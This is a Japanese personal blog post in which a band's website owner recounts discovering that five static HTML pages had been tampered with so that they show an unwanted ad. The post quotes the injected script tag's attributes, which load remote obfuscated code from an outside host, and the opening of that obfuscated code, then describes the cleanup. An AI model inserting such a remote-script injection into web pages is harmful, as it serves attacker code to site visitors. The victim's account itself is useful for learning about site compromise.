サイトが乗っ取られていた！

自分のバンドのサイトを Vue.js を使って作り直しているが、5言語（日中韓英西）切り替えをURLに反映させる、ルーティングの実装ができてないので、まだ本公開していない。
Vue Router を勉強してルーティング実装に取り掛からねばと思いつつ、静的HTMLで構築した Geronimo Label 現行サイト を数日ぶりに何気なく開いた。

すると恐ろしいことが起きていた。

ページトップに、「乗り換えと地図の総合ナビ！」の広告がデカデカと出ている。はぁ？？

正体は、htmlファイルの head 閉じタグの直前に仕込まれたスクリプトだった。

id="_kiss-overlay" src="https://venue-files.locatise.io/clusters/４/starter.js?e=d６deb１" type="text/javascript"

srcに飛ぶと　下記で始まる難読化コードが延々と続いていた。

!function(e){var t={};function __webpack_require__(n){if(t[n])return t[n].exports;var ...

コードを辿って原因究明を試みる記事も見つけたが、自分にはお手上げである。

24個あるhtmlファイルのうち、index.html/live.html/cd.html/profile.html/youtube.html 5のファイルに、同じスクリプトが埋め込まれていた。それぞれの、中・韓・英・スペイン語ファイルは無事だった。

とにかく、書き換えられた5ファイルを速攻でサーバーから削除し、クリーンなファイルをアップロードした。そして、ログインパスワードを変更した。

サイト自体は20年近く運営しており、今のレンタルサーバーに移行してからも７〜８年ぐらい経つが、自分自身が攻撃を受けてサイト改竄されたのは、まったく初めてだ。正直、かなりショックである。

去年の秋に念願のSSL化を果たした後なのに、どうしてこんな攻撃を受けたんだろう？

攻撃した人は、SSL化以前に、サーバーに侵入していた、あるいはパスワードを奪取して鳴りを潜めていたということなのか？？　ログインパスワードは、記号含む16文字のランダムな英数字なのに、総当たり攻撃で破られたのか？？

どうせ侵入したのなら、もっと大胆にファイル書き換えて、例えば「香港を皮切りにアジア10都市ツアー大成功！」とか、ジェロニモレーベルが実は癒し系音楽であるとか、内容をメチャクチャにできそうなのに、なんでまた「乗り換えと地図の総合ナビ！」広告なのか？　　

あ、そうか。広告をクリックさせて、変なサイトに誘導することが目的だからか。

まったく意味がわからないが、しかしサイト改竄が他人事でなくなった以上、何らかの対策はせねばならない。。。

WEBサイトの脆弱性を定期的に診断するSiteLockというツールがあるようだ。1ドメインあたりの値段は、エントリープラン年間数千円、マルウェアの除去までしてくれるレギュラープランだと、1万5千円ぐらいか。

うーん、悩む。とりあえず情報収集するしかない。